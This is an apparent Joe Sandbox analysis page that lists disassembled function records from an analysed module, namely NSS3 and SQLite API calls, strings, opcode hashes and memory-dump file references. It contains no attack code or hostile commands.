Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: e279f86ca1eebb052808eb49dbe5bfe56ff1f2ead8554b79223ef2c40a2ea668
Instruction ID: ed9f8890caf1618970b62c453dea02321912a30f838054819f8d1b23e6c41abc
Opcode Fuzzy Hash: e279f86ca1eebb052808eb49dbe5bfe56ff1f2ead8554b79223ef2c40a2ea668
Instruction Fuzzy Hash: DDF0C2F5A112967BEB009F7A9C0994B7758EF14269B018435E81DD3B00EB30E114CEE5

Function 6CB8ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CB8A6D8), ref: 6CB8AE0D
free.MOZGLUE(?), ref: 6CB8AE14
DeleteCriticalSection.KERNEL32(6CB8A6D8), ref: 6CB8AE36
free.MOZGLUE(?), ref: 6CB8AE3D
free.MOZGLUE(00000000,00000000,?,?,6CB8A6D8), ref: 6CB8AE47

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 996e7e9e886904ea5242e214ebe5a52c7077ea87130f9e0a20e6fc7e53da0d50
Instruction ID: 22b333d8173ffc83853c7466647bedebb344f0e0aeb33675e52c5e2499d4482e
Opcode Fuzzy Hash: 996e7e9e886904ea5242e214ebe5a52c7077ea87130f9e0a20e6fc7e53da0d50
Instruction Fuzzy Hash: B5F09675202A05A7CA109FA9D80C957777CFF9E7757240328F53A83980D732E216CBE6

Function 6CA17C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA17D35

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA17D13, 6CA17D1F, 6CA17D47, 6CA17D53, 6CA17D5F
%s at line %d of [%.10s], xrefs: 6CA17D2E
database corruption, xrefs: 6CA17D29

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 839da266e5922484f88be00f930ef3bcca923e29fdf43be05724f053aa6458f9
Instruction ID: a18485b18a1c812a0e029b450068d7f7bda6d6fe0e9138df64de1a1e49308294
Opcode Fuzzy Hash: 839da266e5922484f88be00f930ef3bcca923e29fdf43be05724f053aa6458f9
Instruction Fuzzy Hash: C7310471E082699BC710CF9EC8809BEB7F5EF88315B591196F444F7B81D6B1E881CBA0

Function 6CA06C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CA06D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA06D20
%s at line %d of [%.10s], xrefs: 6CA06D2F
database corruption, xrefs: 6CA06D2A

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 7530444b1a6b8cd320e8c236e811cf87223b0859245b1fd9ac6621cf7b412444
Instruction ID: 7c2a993b71433028b515e20341bed7fd347e1ab9a1d77e16a21ed1dc1945fd8b
Opcode Fuzzy Hash: 7530444b1a6b8cd320e8c236e811cf87223b0859245b1fd9ac6621cf7b412444
Instruction Fuzzy Hash: 47210030704B059BC710CE2AE841B5AB7E2AF8035CF288528DC599BF50E770F9C9C792

Function 6CB3CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CB3CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB3CC7B), ref: 6CB3CD7A
Part of subcall function 6CB3CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB3CD8E
Part of subcall function 6CB3CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB3CDA5
Part of subcall function 6CB3CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB3CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CB3CCB5
memcpy.VCRUNTIME140(6CBD14F4,6CBD02AC,00000090), ref: 6CB3CCD3
memcpy.VCRUNTIME140(6CBD1588,6CBD02AC,00000090), ref: 6CB3CD2B

Part of subcall function 6CA59AC0: socket.WSOCK32(?,00000017,6CA599BE), ref: 6CA59AE6
Part of subcall function 6CA59AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CA599BE), ref: 6CA59AFC

Part of subcall function 6CA60590: closesocket.WSOCK32(6CA59A8F,?,?,6CA59A8F,00000000), ref: 6CA60597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CB3CCB0

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 4670423b69ddeafd461381698ee055f999e8d4cc1f8654bd2c6951efa8d31b61
Instruction ID: 2bd2e0a6b6ddf198113be2c1d69c558ab0da9a869ce61a4fd11dc919d2e90216
Opcode Fuzzy Hash: 4670423b69ddeafd461381698ee055f999e8d4cc1f8654bd2c6951efa8d31b61
Instruction Fuzzy Hash: 7111D3F9B122D05EDB009FA9D8167563AB8D34673CF181129E41ACBB41E738EC048BD6

Function 6CAA1CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6CAA1CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CAA1CF1

Part of subcall function 6CB809D0: PR_Now.NSS3 ref: 6CB80A22
Part of subcall function 6CB809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB80A35
Part of subcall function 6CB809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB80A66
Part of subcall function 6CB809D0: PR_GetCurrentThread.NSS3 ref: 6CB80A70
Part of subcall function 6CB809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB80A9D
Part of subcall function 6CB809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB80AC8
Part of subcall function 6CB809D0: PR_vsmprintf.NSS3(?,?), ref: 6CB80AE8
Part of subcall function 6CB809D0: EnterCriticalSection.KERNEL32(?), ref: 6CB80B19
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB80B48
Part of subcall function 6CB809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB80C76
Part of subcall function 6CB809D0: PR_LogFlush.NSS3 ref: 6CB80C7E

Strings

pInitArgs = 0x%p, xrefs: 6CAA1CEC
C_Initialize, xrefs: 6CAA1CD3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize
API String ID: 1907330108-3943720641
Opcode ID: a3e28e56592dc0c3b00e071bdb105497b01646b4d63611a8e4650e098d1532eb
Instruction ID: e3f2e0ca4b502527b782797387cd64423f884e90089a4173705b67829f97930a
Opcode Fuzzy Hash: a3e28e56592dc0c3b00e071bdb105497b01646b4d63611a8e4650e098d1532eb
Instruction Fuzzy Hash: 4E015239301181FFDF049F94E96DB6977B5EB86369F084025E90993A11DB34ECCACB92

Function 6C9FA8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6CB2A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CB4C3A2,?,?,00000000,00000000), ref: 6CB2A528
Part of subcall function 6CB2A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB2A6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9FA94F

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9FA939
%s at line %d of [%.10s], xrefs: 6C9FA948
database corruption, xrefs: 6C9FA943

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 02d9126ba3dbc26365d5f8f0e7153a831383215528fb75bd28c233e55d5eb4f0
Instruction ID: 3c5ecf204b5b02ca6685f596461d69ca811d641770674072988d042acfd07274
Opcode Fuzzy Hash: 02d9126ba3dbc26365d5f8f0e7153a831383215528fb75bd28c233e55d5eb4f0
Instruction Fuzzy Hash: DF014E31A002485BC7008675DD01B5FB3FCDF44318F454539E95D57A40DB71E9098791

Function 6CA88850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CA90715), ref: 6CA88859
PR_NewLock.NSS3 ref: 6CA88874

Part of subcall function 6CB398D0: calloc.MOZGLUE(00000001,00000084,6CA60936,00000001,?,6CA6102C), ref: 6CB398E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CA8888D

Strings

NSS, xrefs: 6CA88887

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 8f97c1df437d1082cfeb2b2854fca88038a3c331bd7a471e2bd7d0dea8562755
Instruction ID: 7670594ef77da243a50f5854c1b38786bd445d1d913e4b9c7abc8d292df2331d
Opcode Fuzzy Hash: 8f97c1df437d1082cfeb2b2854fca88038a3c331bd7a471e2bd7d0dea8562755
Instruction Fuzzy Hash: 42F09666E4362033F21021696D0AB8675985F5579EF480031E90DA7B82EE51955C83F7

Function 6CAE1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CAE1D8F

Part of subcall function 6CAD14C0: TlsGetValue.KERNEL32 ref: 6CAD14E0
Part of subcall function 6CAD14C0: EnterCriticalSection.KERNEL32 ref: 6CAD14F5
Part of subcall function 6CAD14C0: PR_Unlock.NSS3 ref: 6CAD150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CAE1DA6

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CAE1E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAE1ED0

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: 3ba227c5c949f2ab1f4f00093783f7074b49c3b63eec5d885c2cdb5e80eca109
Instruction ID: 90393c2af35cd644fc0a00779e243ef17eb1a71a38282f89d1790b3a82c1d279
Opcode Fuzzy Hash: 3ba227c5c949f2ab1f4f00093783f7074b49c3b63eec5d885c2cdb5e80eca109
Instruction Fuzzy Hash: 39515975A00319CFDB00CF98C884BBEB7B6BF49318F144129EA199B752D731E989CB90

Function 6CA6C9B0 Relevance: 6.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3 ref: 6CA6CB3D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA6CB4B
sqlite3_free.NSS3 ref: 6CA6CB70
sqlite3_result_error_nomem.NSS3 ref: 6CA6CB99

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
String ID:
API String ID: 1052848593-0
Opcode ID: 7b1f605d6ca953b4742fef91bd83d773458e5c9b860a62574757080519eface7
Instruction ID: 89a52598ed784316b777ae6c8ea8f3fd155b3f1d034121001012a245e17daa6a
Opcode Fuzzy Hash: 7b1f605d6ca953b4742fef91bd83d773458e5c9b860a62574757080519eface7
Instruction Fuzzy Hash: 5351C132609B498ADB01EF36C04016FB7F1BF9A79CF148A0DE8966B950EB35D4C5C792

Function 6CB34FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6CA185D2,00000000,?,?), ref: 6CB34FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB3500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB350C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB350D6

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: dc87b1270c6ead85cc86fce7a4a14f91449c361408ef119407b9d62d563849af
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: DC419DB6A002518BCB18CF18DCD179AB7E1FF4431871D4669C84ACBB02E779E895CB85

Function 6CA5FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3(00000000,?,?,?,6CA5FDFE), ref: 6CA5FFAD

Part of subcall function 6C9FCA30: EnterCriticalSection.KERNEL32(?,?,?,6CA5F9C9,?,6CA5F4DA,6CA5F9C9,?,?,6CA2369A), ref: 6C9FCA7A
Part of subcall function 6C9FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C9FCB26

memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6CA5FDFE), ref: 6CA5FFDF
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6CA5FDFE), ref: 6CA6001C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6CA5FDFE), ref: 6CA6006F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
String ID:
API String ID: 2358433136-0
Opcode ID: 9f71716a6a957cadb901735fdff22cc9f3b2430667acf2dc2621fb4d473b0250
Instruction ID: 94ca809c16845ea5fb7ef6a51a09a1b85595257c46261410aa643f3aa176b671
Opcode Fuzzy Hash: 9f71716a6a957cadb901735fdff22cc9f3b2430667acf2dc2621fb4d473b0250
Instruction Fuzzy Hash: 0341DE75B002959FDB08DFA5D896AAE7779FF49314F084039D80693B01DB39A981CBE1

Function 6CAECF00 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CAED01E

Part of subcall function 6CABE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CABE5A0

PK11_FreeSymKey.NSS3(00000000), ref: 6CAED055

Part of subcall function 6CABADC0: TlsGetValue.KERNEL32(?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE10
Part of subcall function 6CABADC0: EnterCriticalSection.KERNEL32(?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE24
Part of subcall function 6CABADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CA9D079,00000000,00000001), ref: 6CABAE5A
Part of subcall function 6CABADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE6F
Part of subcall function 6CABADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE7F
Part of subcall function 6CABADC0: TlsGetValue.KERNEL32(?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAEB1
Part of subcall function 6CABADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAEC9

PK11_PubUnwrapSymKey.NSS3(?,00000000,6CAECC55,00000107,00000000), ref: 6CAED079
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAED08C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_$CriticalEnterErrorSectionValue$DeriveFreeUnlockUnwrapWithfreememset
String ID:
API String ID: 324975836-0
Opcode ID: 091c2b969c1ed5253e274e18973720c514f00799ab680566d5bc1bb561a2a420
Instruction ID: 85162b0e28b2b37238270aa33e21280a209b42a9012a15f0b35402c818d170de
Opcode Fuzzy Hash: 091c2b969c1ed5253e274e18973720c514f00799ab680566d5bc1bb561a2a420
Instruction Fuzzy Hash: 65417FB19042199BE7108F15DC40BA9F7F5FF88308F0986AAE94DA7741E3319A86CB91

Function 6CAE3D40 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,-0000002C,?,6CAE127F,?), ref: 6CAE3D89

Part of subcall function 6CAE06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6CAE2E70,00000000), ref: 6CAE0701

SECOID_FindOID_Util.NSS3(FFFFFFFF,?), ref: 6CAE3DD3

Part of subcall function 6CAD07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA78298,?,?,?,6CA6FCE5,?), ref: 6CAD07BF
Part of subcall function 6CAD07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CAD07E6
